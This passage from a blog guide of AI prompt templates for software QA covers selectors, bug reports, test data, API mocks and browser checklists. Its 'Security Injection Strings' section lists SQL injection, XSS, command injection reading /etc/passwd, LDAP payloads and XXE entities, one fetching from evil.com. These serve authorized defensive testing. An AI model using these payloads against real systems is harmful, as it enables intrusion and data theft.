page.getByRole('[ROLE]', { name: '[TEXT]' })
END CODE

XPATH (Last Resort)
Type | Syntax | Example
By ID | //*[@id="value"] |
By text | //*[text()="Value"] |
By attribute | //*[@data-cy="value"] |
By position | (//div)[5] |
By parent | //parent//child |

DYNAMIC ELEMENT HANDLING
Challenge | Solution
Dynamic ID | Use stable parent or data attributes
Changing text | Use contains or regex
Multiple matches | Add index or more specific selector
Shadow DOM | Use shadow piercing selector
Iframe | Switch context first

BEST PRACTICES
- Add data-testid during development
- Avoid XPath when possible
- Don't use generated class names
- Make selectors resilient to change
- Avoid indices when possible
- Test selectors in devtools first
- Document complex selectors

Customize it: Paste the actual HTML element you need a selector for.
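
To see the priority order in practice, here is a short Playwright sketch for a hypothetical checkout button. The HTML, URL, and selector values are assumptions; the point is the order in which you reach for them.

CODE:
// Hypothetical element: <button id="btn-4f2a" class="css-1x2y3z"
//   data-testid="checkout-submit">Pay now</button>
import { test, expect } from '@playwright/test';

test('checkout submit button is reachable by stable selectors', async ({ page }) => {
  await page.goto('https://staging.example.com/checkout');

  // Preferred: an intentional test hook that survives styling and markup changes.
  await expect(page.getByTestId('checkout-submit')).toBeVisible();

  // Acceptable fallback: accessible role plus visible text.
  await expect(page.getByRole('button', { name: 'Pay now' })).toBeVisible();

  // Avoid: '#btn-4f2a' and '.css-1x2y3z' look unique but are generated and will change.
});
END CODE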

Test Data and Reporting Prompts

10. Bug Report Generator

A good bug report saves hours of back-and-forth. I’ve seen bug reports that took 5 minutes to write and 2 hours to debug, and I’ve seen bug reports that took 10 minutes to write and 10 minutes to fix. This prompt helps you write the latter. For comprehensive error handling patterns, see our AI error handling snippets.

Purpose: Create clear, actionable bug reports
Use case: Documenting bugs for developers


Prompt:

You are a Bug Report Specialist. Your task is to create clear, actionable bug reports that help developers quickly understand and fix issues.

CONTEXT
- Bug Type: {FUNCTIONAL/UI/PERFORMANCE/SECURITY}
- Feature/Area: {WHERE DID YOU FIND THE BUG?}
- Environment: {BROWSER, OS, VERSION}
- Reproduction Rate: {100%/50%/INTERMITTENT}
- Reported By: {WHO FOUND IT?}

BUG REPORT FRAMEWORK
Field | Purpose | Example
Title | Quick identification | "Login fails on Safari 15"
Summary | Brief description | What and where
Steps to Reproduce | How to trigger | Numbered list
Actual Result | What happened | Current behavior
Expected Result | What should happen | Correct behavior
Severity | Impact level | Blocker/Critical/Major/Minor
Priority | Fix urgency | P1/P2/P3
Environment | Where it occurs | OS, Browser, Version
Evidence | Proof of bug | Screenshot, logs

OUTPUT FORMAT - BUG REPORT
Basic Information
Field | Value
Bug ID | BUG-[NUMBER]
Title |
Status | New/Confirmed/In Progress/Fixed
Severity | Critical/High/Medium/Low
Priority | P1/P2/P3
Assigned to |
Reporter |

Description
Summary: [Brief one-line description]

Module: [Feature/Area where bug occurs]

Environment:
Property | Value
OS |
Browser |
App Version |
Device |

Steps to Reproduce
Step | Action | Expected | Actual
1 | | | |
2 | | | |
3 | | | |

Reproduction Rate: [100% / 50% / Intermittent]

Actual vs Expected
Actual Behavior: [What actually happens]

Expected Behavior: [What should happen]

Evidence
- [ ] Screenshot attached
- [ ] Video recording attached
- [ ] Console logs attached
- [ ] Network logs attached
- [ ] HAR file attached

Screenshot: [Description of visual]

Additional Information
Root Cause (if known): [Analysis of why it happens]

Suggested Fix (optional): [How to fix it]

Workaround: [Temporary solution]

BEST PRACTICES
- Reproduce the bug before reporting
- Be specific about versions and environment
- Include exact steps, not generalizations
- Add evidence (screenshots, logs)
- Distinguish actual vs expected clearly
- Assign appropriate severity/priority
- Follow up with reproduction rate

Customize it: Be as specific as possible. Vague bug reports like “it doesn’t work” are useless.

11. Synthetic User Generator

Real user data has GDPR implications. Fake data can be unrealistic. This prompt generates synthetic user data that’s realistic enough for testing but safe to use.

Purpose: Generate realistic synthetic user data for testing
Use case: Creating test data for forms, APIs, and databases


Prompt:

You are a Test Data Specialist. Your task is to generate realistic synthetic user data for testing.

CONTEXT
- Number of Users: {HOW MANY DO YOU NEED?}
- User Type: {REGISTERED/TEST/BOT/MIXED}
- Fields Required: {WHAT DATA FIELDS?}
- Format: {JSON/CSV/SQL}
- Region/Locale: {US/UK/EU/etc.}
- Special Requirements: {ANY EDGE CASES?}

USER DATA FRAMEWORK
Field Type | Format | Example
Name | First Last | John Smith
Email | format@domain | john.smith@test.com
Phone | Format varies | +1-555-0123
Address | Street, City, Zip | 123 Main St, NYC
Date | YYYY-MM-DD | 1990-05-15
Country | ISO code | US

OUTPUT FORMAT - JSON
CODE:
[
  {
    "id": 1,
    "firstName": "",
    "lastName": "",
    "email": "",
    "phone": "",
    "address": {
      "street": "",
      "city": "",
      "state": "",
      "zipCode": "",
      "country": ""
    },
    "dateOfBirth": "",
    "gender": "",
    "username": "",
    "password": "",
    "createdAt": "",
    "status": ""
  }
]
END CODE

User Data Table
ID | First Name | Last Name | Email | Phone | City
1 | | | | |
2 | | | | |
3 | | | | |

Special Data Variations
User Type | Characteristics
Edge case | Empty fields, special chars
International | Non-US formats
Long values | Max length strings
Unicode | Non-ASCII characters

Data Quality Notes
Check | Status
Unique emails | ☐
Valid phone format | ☐
Realistic names | ☐
Consistent data | ☐

BEST PRACTICES
- Ensure email uniqueness
- Use realistic name/address distributions
- Include edge case users
- Vary data for diversity
- Match locale formatting
- Include invalid data for negative tests

Customize it: Specify exactly what fields you need and what format works best for your test infrastructure.
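
If you would rather generate the data locally than paste it from a chat, a small script does the same job. This sketch assumes the @faker-js/faker package (v8 or later) is installed; the field names mirror the JSON template above.

CODE:
// Generate synthetic users locally with @faker-js/faker (assumed installed).
import { faker } from '@faker-js/faker';

function buildUser(id: number) {
  const firstName = faker.person.firstName();
  const lastName = faker.person.lastName();
  return {
    id,
    firstName,
    lastName,
    email: faker.internet.email({ firstName, lastName }).toLowerCase(),
    phone: faker.phone.number(),
    address: {
      street: faker.location.streetAddress(),
      city: faker.location.city(),
      state: faker.location.state(),
      zipCode: faker.location.zipCode(),
      country: 'US',
    },
    dateOfBirth: faker.date.birthdate().toISOString().slice(0, 10),
    username: `${firstName}.${lastName}`.toLowerCase(),
    status: faker.helpers.arrayElement(['active', 'inactive', 'pending']),
    createdAt: new Date().toISOString(),
  };
}

// 50 users, printed as JSON for fixtures or API seeding.
const users = Array.from({ length: 50 }, (_, i) => buildUser(i + 1));
console.log(JSON.stringify(users, null, 2));
END CODE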

12. SQL Insert Statement Generator

Database testing requires database data. This prompt generates SQL INSERT statements with realistic test data for your specific table schema.

Purpose: Generate SQL INSERT statements with realistic test data
Use case: Creating test data in databases


Prompt:

You are a Test Data Specialist. Your task is to generate SQL INSERT statements with realistic test data.

CONTEXT
- Table Name: {YOUR TABLE NAME}
- Columns: {LIST COLUMNS WITH TYPES}
- Number of Rows: {HOW MANY?}
- Database Type: {MYSQL/POSTGRESQL/SQLITE/MSSQL}
- Data Type: {RANDOM/SPECIFIC PATTERNS}
- Constraints: {ANY CONSTRAINTS?}

SQL FRAMEWORK
Basic INSERT Syntax
INSERT INTO table_name (col1, col2, col3)
VALUES (val1, val2, val3);

Bulk INSERT Syntax
INSERT INTO table_name (col1, col2, col3)
VALUES
  (val1, val2, val3),
  (val1, val2, val3),
  (val1, val2, val3);

OUTPUT FORMAT - TABLE SCHEMA
Column | Type | Constraint | Sample Value
| | |
| | |

INSERT Statements Template
CODE:
INSERT INTO [TABLE_NAME] ([COLUMNS])
VALUES
-- Row 1
([VALUES]),
-- Row 2
([VALUES]),
-- Row 3
([VALUES]);
END CODE

Generated Data Rows
Row # | Column Values
1 | |
2 | |
3 | |

Sample Output (PostgreSQL)
CODE:
INSERT INTO users (id, name, email, created_at, status)
VALUES
(1, 'John Smith', 'john.smith@test.com', '2024-01-01 00:00:00', 'active'),
(2, 'Jane Doe', 'jane.doe@test.com', '2024-01-02 00:00:00', 'active'),
(3, 'Bob Wilson', 'bob@test.com', '2024-01-03 00:00:00', 'inactive');
END CODE

Data Variation Guidelines
Type | Strategy
IDs | Sequential or UUID
Names | Varied, realistic
Emails | Based on name
Dates | Spread over range
Status | Realistic distribution
FKs | Reference valid IDs

Special Data Cases
Case | Approach
NULL values | Random distribution
Foreign keys | Reference valid IDs
Unique constraints | Ensure uniqueness
Default values | Use when appropriate
Timestamps | Use NOW() or specific dates

BEST PRACTICES
- Match database syntax exactly
- Ensure foreign key validity
- Handle NULLs appropriately
- Maintain data consistency
- Include realistic value distributions
- Consider performance for large datasets

Customize it: Provide your table schema so the INSERT statements match your actual database.

13. JSON Response Mocker

API testing requires API responses. This prompt generates realistic mock responses based on your API schemas, including error scenarios.

Purpose: Create realistic mock API responses based on schemas
Use case: Mocking APIs for frontend and integration testing


Prompt:

You are an API Mocking Specialist. Your task is to create realistic mock API responses based on schemas.

CONTEXT
- API Endpoint: {ENDPOINT PATH}
- HTTP Method: {GET/POST/PUT/DELETE}
- Response Schema: {DESCRIBE THE SCHEMA}
- Status Codes: {WHAT CODES CAN IT RETURN?}
- Response Type: {SUCCESS/ERROR/BOTH}
- Pagination: {OFFSET/CURSOR/NONE}

API RESPONSE FRAMEWORK
Standard Response Structure
CODE:
{
  "data": {},
  "meta": {
    "message": "",
    "status": 200,
    "timestamp": ""
  }
}
END CODE

Error Response Structure
CODE:
{
  "error": {
    "code": "",
    "message": "",
    "details": []
  },
  "meta": {
    "status": 400,
    "timestamp": ""
  }
}
END CODE

OUTPUT FORMAT - SUCCESS RESPONSE
CODE:
{
  "data": {
    "id": "",
    "type": "",
    "attributes": {
      // Fields here
    },
    "relationships": {
      // Related resources
    }
  },
  "included": [],
  "links": {
    "self": "",
    "next": "",
    "last": ""
  }
}
END CODE

Response Examples
Single Resource
Field | Type | Description | Example
id | string | Unique identifier | "usr_123"
name | string | Resource name | "Sample"
createdAt | string | ISO timestamp | "2024-01-01T00:00:00Z"

List Response
Field | Type | Description
data | array | List of resources
meta | object | Pagination info
links | object | Navigation links

Error Response
Field | Type | Description
error.code | string | Error code
error.message | string | Human-readable message
error.details | array | Additional details

Pagination Variants
Type | Response Parameters
Offset | page=1, limit=20
Cursor | cursor=abc123
None | All results returned

Mock Scenarios
Scenario 1: Standard Success
CODE:
{
  "data": {},
  "meta": {
    "status": 200,
    "message": "Success"
  }
}
END CODE

Scenario 2: Empty Result
CODE:
{
  "data": [],
  "meta": {
    "status": 200,
    "message": "No data found"
  }
}
END CODE

Scenario 3: Validation Error
CODE:
{
  "error": {
    "code": "VALIDATION_ERROR",
    "message": "Invalid input",
    "details": [
      {
        "field": "email",
        "message": "Invalid format"
      }
    ]
  }
}
END CODE

Scenario 4: Server Error
CODE:
{
  "error": {
    "code": "INTERNAL_ERROR",
    "message": "An error occurred"
  }
}
END CODE

BEST PRACTICES
- Match real API structure exactly
- Include all possible fields
- Use realistic data values
- Handle all error scenarios
- Consider edge cases
- Include pagination metadata

Customize it: Describe your actual API schema for accurate mocking.
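
Once you have the mock shapes, you can serve them straight from your tests. Here is a hedged Playwright sketch using request interception; the endpoint, selectors, and page URLs are assumptions for illustration.

CODE:
// Serve mock API responses from a Playwright test via request interception.
import { test, expect } from '@playwright/test';

test('renders an empty state when the API returns no results', async ({ page }) => {
  await page.route('**/api/v1/users*', (route) =>
    route.fulfill({
      status: 200,
      contentType: 'application/json',
      body: JSON.stringify({ data: [], meta: { status: 200, message: 'No data found' } }),
    })
  );

  await page.goto('https://staging.example.com/users');
  await expect(page.getByTestId('empty-state')).toBeVisible();
});

test('surfaces a validation error from the API', async ({ page }) => {
  await page.route('**/api/v1/users', (route) =>
    route.fulfill({
      status: 400,
      contentType: 'application/json',
      body: JSON.stringify({
        error: {
          code: 'VALIDATION_ERROR',
          message: 'Invalid input',
          details: [{ field: 'email', message: 'Invalid format' }],
        },
      }),
    })
  );

  await page.goto('https://staging.example.com/users/new');
  await page.getByTestId('save-button').click();
  await expect(page.getByTestId('form-error')).toContainText('Invalid format');
});
END CODE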

Cross-Platform and Security Prompts

14. Cross-Browser Testing Checklist

Browsers render differently. Safari doesn’t always behave like Chrome. Firefox has its quirks. Edge is its own thing. This prompt creates a checklist to verify your app works across browsers and devices.

Purpose: Create a comprehensive checklist for verifying UI consistency across devices and browsers
Use case: Cross-browser and cross-device testing


Prompt:

You are a Cross-Browser Testing Specialist. Your task is to create a comprehensive checklist for verifying UI consistency across devices and browsers.

CONTEXT
- Application Type: {WEB/MOBILE-WEB/RESPONSIVE}
- Target Browsers: {CHROME/FIREFOX/SAFARI/EDGE}
- Target Devices: {DESKTOP/TABLET/MOBILE}
- Screen Sizes: {WHAT SIZES TO TEST?}
- Key Features: {CRITICAL FEATURES TO VERIFY}

BROWSER TESTING MATRIX
Browser | Version | Priority | Critical Checks
Chrome | Latest | High | Core functionality
Firefox | Latest | High | CSS/JS compatibility
Safari | Latest | High | WebKit differences
Edge | Latest | Medium | Chromium compatibility

OUTPUT FORMAT - DESKTOP CHECKLIST (1366px+)
Category | Check Item | Chrome | Firefox | Safari | Edge
Layout | Grid alignment | ☐ | ☐ | ☐ | ☐
Layout | Flexbox behavior | ☐ | ☐ | ☐ | ☐
Layout | Typography | ☐ | ☐ | ☐ | ☐
Forms | Input focus states | ☐ | ☐ | ☐ | ☐
Forms | Validation messages | ☐ | ☐ | ☐ | ☐
Forms | Button hover | ☐ | ☐ | ☐ | ☐
Media | Image rendering | ☐ | ☐ | ☐ | ☐
Media | Video playback | ☐ | ☐ | ☐ | ☐
Media | Font loading | ☐ | ☐ | ☐ | ☐

TABLET CHECKLIST (768px - 1024px)
Category | Check Item | iPad | Android Tablet
Layout | Responsive breakpoints | ☐ | ☐
Layout | Touch targets (44px+) | ☐ | ☐
Layout | Scroll behavior | ☐ | ☐
Navigation | Hamburger menu | ☐ | ☐
Navigation | Swipe gestures | ☐ | ☐

MOBILE CHECKLIST (< 768px)
Category | Check Item | iOS | Android
Viewport | Meta viewport set | ☐ | ☐
Viewport | No horizontal scroll | ☐ | ☐
Touch | Tap targets | ☐ | ☐
Touch | Gesture support | ☐ | ☐
OS Features | Pull-to-refresh | ☐ | ☐
OS Features | Safe area insets | ☐ | ☐

CRITICAL FUNCTIONALITY TESTS
Feature | Browser | Test | Expected | Result
Login | Chrome | Standard login | Success |
Forms | Firefox | Submit with validation | Shows errors |
API | Safari | AJAX calls | Works |

VISUAL REGRESSION POINTS
Component | Desktop | Tablet | Mobile
Header | ☐ | ☐ | ☐
Hero section | ☐ | ☐ | ☐
Cards | ☐ | ☐ | ☐
Footer | ☐ | ☐ | ☐

BEST PRACTICES
- Test in real devices when possible
- Focus on highest-market-share browsers first
- Document known browser quirks
- Use responsive design breakpoints
- Test with actual user agent strings
- Consider browser-specific CSS prefixes

Customize it: Customize the checklist based on your application’s specific features and requirements.
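
You can automate a slice of this matrix by running the same suite across engines and device profiles. Here is a playwright.config.ts sketch; the project list and baseURL are assumptions, and real devices are still worth testing for anything touch- or rendering-sensitive.

CODE:
// playwright.config.ts sketch: one suite, several browsers and device profiles.
import { defineConfig, devices } from '@playwright/test';

export default defineConfig({
  use: { baseURL: 'https://staging.example.com' },
  projects: [
    { name: 'Desktop Chrome', use: { ...devices['Desktop Chrome'] } },
    { name: 'Desktop Firefox', use: { ...devices['Desktop Firefox'] } },
    { name: 'Desktop Safari', use: { ...devices['Desktop Safari'] } },
    { name: 'Mobile Safari', use: { ...devices['iPhone 13'] } },
    { name: 'Mobile Chrome', use: { ...devices['Pixel 7'] } },
  ],
});
END CODE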

15. Security Injection Strings

Security testing is everyone’s responsibility, not just the security team’s. This prompt generates common injection payloads for testing input validation. Use only in test environments with authorization. The OWASP Foundation provides comprehensive security testing guidelines and the Input Validation Cheat Sheet covers best practices for preventing injection vulnerabilities.

Purpose: Generate common injection payloads for security testing
Use case: Testing input validation and sanitization


Prompt:

You are a Security Testing Specialist. Your task is to generate common injection payloads for security testing.

CONTEXT
- Target: {FORM/API/INPUT/URL PARAMETER}
- Input Type: {TEXT/NUMBER/QUERY/PARAM}
- Injection Type: {SQLI/XSS/CSI/LDAP}
- Encoding: {URL/BASE64/HEX}
- Test Type: {AUTOMATED/MANUAL}

INJECTION TYPES FRAMEWORK
Type | Purpose | Risk Level
SQL Injection | Database compromise | Critical
XSS | Script injection | High
Command Injection | OS command execution | Critical
LDAP Injection | Directory traversal | High
XXE | XML entity injection | Critical

OUTPUT FORMAT - SQL INJECTION PAYLOADS
Payload | Type | Purpose
' OR '1'='1 | Boolean-based | Bypass conditions
' UNION SELECT | Union-based | Extract data
' WAITFOR DELAY | Time-based | Blind SQLi
'; DROP TABLE | Destructive | Delete data
admin'-- | Authentication | Bypass login

SQLi - Authentication Bypass
CODE:
admin'--
admin' OR '1'='1
' OR 1=1--
' OR 'x'='x
END CODE

SQLi - Union Based
CODE:
' UNION SELECT 1,2,3--
' UNION SELECT user,password FROM users--
' UNION SELECT null,@@version--
END CODE

SQLi - Time Based
CODE:
'; WAITFOR DELAY '0:0:5'--
' OR SLEEP(5)--
'; IF(1=1) WAITFOR DELAY '0:0:5'--
END CODE

SQLi - Error Based
CODE:
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
END CODE

XSS PAYLOADS
Payload | Type | Description
<script>alert(1)</script> | Stored | Persistent XSS
javascript:alert(1) | DOM | URL-based
<img src=x onerror=alert(1)> | Reflected | Image error handler
"><script>alert(1)</script> | Stored | Attribute breakout

XSS - Basic
CODE:
<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body onload=alert(1)>
END CODE

XSS - Event Handlers
CODE:
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<object data="javascript:alert(1)">
END CODE

XSS - Polyglots
CODE:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=
END CODE

Command Injection Payloads
CODE:
; cat /etc/passwd
| whoami
$(whoami)
`id`
&& dir
|| ls
END CODE

LDAP Injection Payloads
CODE:
*)(uid=*))(|(uid=*
*)(objectClass=*)
*)(userPassword=*)
END CODE

XXE Payloads
CODE:
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY xxe SYSTEM "http://evil.com/evil.dtd">
END CODE

Encoding Variants
Original | URL Encoded | Base64
' OR '1'='1 | %27%20OR%20... | JyBPUiAnMSc9JzE=
<script> | %3Cscript%3E | PHNjcmlwdD4=

BEST PRACTICES
- Get written authorization FIRST
- Test in non-production environments
- Document all findings
- Use low-volume payloads initially
- Don't cause denial of service
- Report responsibly to security team
- Use these only for defensive testing

Customize it: Use only in authorized testing environments. Never use these payloads on production systems without explicit authorization.
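
If you do have authorization and a test environment, payload lists like these slot neatly into a parameterized check. The Playwright sketch below is an assumption-heavy illustration (the URL, selectors, and payload set are mine, not a standard); it only verifies that reflected input stays inert, and it must never be pointed at production.

CODE:
// Feed XSS payloads through a form in an AUTHORIZED test environment only.
import { test, expect } from '@playwright/test';

const payloads = [
  "<script>alert('XSS')</script>",
  '<img src=x onerror=alert(1)>',
  '<svg/onload=alert(1)>',
];

for (const payload of payloads) {
  test(`search input keeps payload inert: ${payload}`, async ({ page }) => {
    let dialogFired = false;
    page.on('dialog', async (dialog) => {
      dialogFired = true;
      await dialog.dismiss();
    });

    await page.goto('https://staging.example.com/search');
    await page.getByTestId('search-input').fill(payload);
    await page.getByTestId('search-submit').click();
    await page.waitForLoadState('networkidle');

    // No script should execute, and no injected element should reach the DOM.
    expect(dialogFired).toBe(false);
    await expect(page.locator('img[onerror], svg[onload]')).toHaveCount(0);
  });
}
END CODE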

Building a Sustainable QA Practice

After years of doing QA work and helping teams improve their testing practices, I’ve learned that the prompts are just one piece of a larger puzzle. The real challenge isn’t writing individual test cases—it’s building a QA culture where quality is everyone’s responsibility.

The Evolution of a QA Engineer

When I started in QA, I thought my job was to find bugs. I’d spend hours manually testing features, documenting every discrepancy I found, and feeling satisfied when developers fixed my findings. This approach works for small projects, but it doesn’t scale—and it creates an adversarial relationship between QA and development.

Over time, my role shifted. Instead of finding bugs after they were written, I started getting involved earlier. I’d review requirements before development began, asking questions like “how will we test this?” and “what are the edge cases?” This shifted my job from detection to prevention. The bugs I caught in review were cheaper to fix than the bugs I found in testing.

Then I moved further left. I started participating in design discussions, helping engineers think about testability before they wrote code. I advocated for logging and observability that would make debugging easier. I built automation that caught regressions before they reached QA. My title didn’t change much, but my impact grew exponentially.

The prompts in this guide support all these phases of QA evolution. Early-phase prompts like Acceptance Criteria to Test Cases help you think systematically about requirements. Testing-phase prompts like Edge Case Brainstormer and Manual Test Case Generator help you verify functionality. Automation prompts help you catch regressions continuously. And if you’re building AI-powered systems yourself, you’ll want to learn how to build a RAG chatbot with proper testing built in from day one.

Managing Test Debt

Just like code debt, test debt accumulates when you take shortcuts. You skip writing a test because “it’s a simple change.” You don’t update a test when requirements shift. You build automation that passes but doesn’t actually verify meaningful behavior. Over time, these shortcuts accumulate until your test suite becomes unreliable, unmaintainable, and untrustworthy.

Managing test debt requires regular attention. I recommend scheduling time specifically for test debt reduction—perhaps one day per sprint where you don’t work on new tests but instead improve existing ones. During this time, look for tests that frequently produce false positives and fix or remove them. Find tests that are slow and optimize them. Update tests that haven’t been touched in months to ensure they’re still relevant.

Metrics That Actually Matter

QA teams often track metrics that feel important but don’t actually predict quality. Test coverage percentages that say nothing about whether the right things are tested. Number of bugs found that says nothing about whether those bugs should have been caught earlier. Pass rates that don’t distinguish between meaningful verification and checkbox-filling.

The metrics I’ve found more useful focus on outcomes rather than activities. Mean time to detect—how long do bugs exist before we find them? Mean time to repair—how long does it take to fix bugs once found? Escaped defects—how many bugs make it to production? These metrics tell you whether your QA process is actually improving quality.


Quick Reference: All QA Prompts

# | Prompt | Purpose | Best For
1 | Acceptance Criteria to Test Cases | AC → test checklist | Requirement testing
2 | Manual Test Case Generator | Step-by-step tests | Test documentation
3 | Severity/Priority Classifier | Bug classification | Bug triage
4 | Regression Test Suite Selector | Select regression tests | Change impact analysis
5 | Edge Case Brainstormer | Identify edge cases | Test planning
6 | Performance Scenario Generator | Load testing plans | Performance testing
7 | Unit Test Writer | Generate unit tests | Code testing
8 | Cypress/Playwright Script Writer | E2E automation | User journey testing
9 | CSS Selector Finder | Find stable selectors | Test automation
10 | Bug Report Generator | Create bug reports | Issue documentation
11 | Synthetic User Generator | Generate test users | Data creation
12 | SQL Insert Statement Generator | Create test data | Database testing
13 | JSON Response Mocker | Mock API responses | API testing
14 | Cross-Browser Testing Checklist | Browser/device testing | UI compatibility
15 | Security Injection Strings | Security payloads | Security testing

Best Practices for QA Prompts

After years of using these prompts, here’s what I’ve learned:

Use prompts for the tedious work, not the thinking. The prompt generates a test case framework—you still need to verify it makes sense. The prompt generates bug report templates—you still need to fill in accurate details.

Iterate on inputs. Your first prompt output might not be perfect. Add more context, clarify constraints, and run the prompt again. The quality of output directly correlates with quality of input.

Combine prompts strategically. Start with Edge Case Brainstormer to identify what to test, then use Manual Test Case Generator to write the tests, then use Bug Report Generator if issues are found.


Frequently Asked Questions

Do I need to use all 15 prompts?

No. Start with the ones that address your immediate needs. If you’re writing a new feature, start with Acceptance Criteria to Test Cases. If you’re planning a release, start with Regression Test Suite Selector.

Can I use these prompts with any AI?

Yes. These prompts work with ChatGPT, Claude, Gemini, or any other conversational AI. Just paste the prompt and fill in your details.

Are these prompts suitable for regulated industries?

Most are, but use judgment. The Security Injection Strings prompt, for example, should only be used with proper authorization and in appropriate environments.

How do I adapt prompts for my specific codebase?

Add context. Replace the bracketed placeholders with your actual code, schemas, and requirements. The prompts are templates—your inputs make them specific.


Ship with Confidence

QA isn’t about being the person who says “no.” It’s about being the person who enables the team to ship faster because they’re confident the release is solid. These 15 prompts will help you work more efficiently, think more systematically, and catch more bugs before they reach production. For more advanced prompting techniques, explore our guide on chain of thought prompting to take your AI-assisted testing to the next level.

Pick one prompt that addresses your current challenge. Try it. Refine it. Add another.

The best releases are the ones where nothing breaks in production. Let’s make those happen more often.


Last Updated: 2026-01-28


Vibe Coder

AI Engineer & Technical Writer
5+ years experience

AI Engineer with 5+ years of experience building production AI systems. Specialized in AI agents, LLMs, and developer tools. Previously built AI solutions processing millions of requests daily. Passionate about making AI accessible to every developer.

AI Agents · LLMs · Prompt Engineering · Python · TypeScript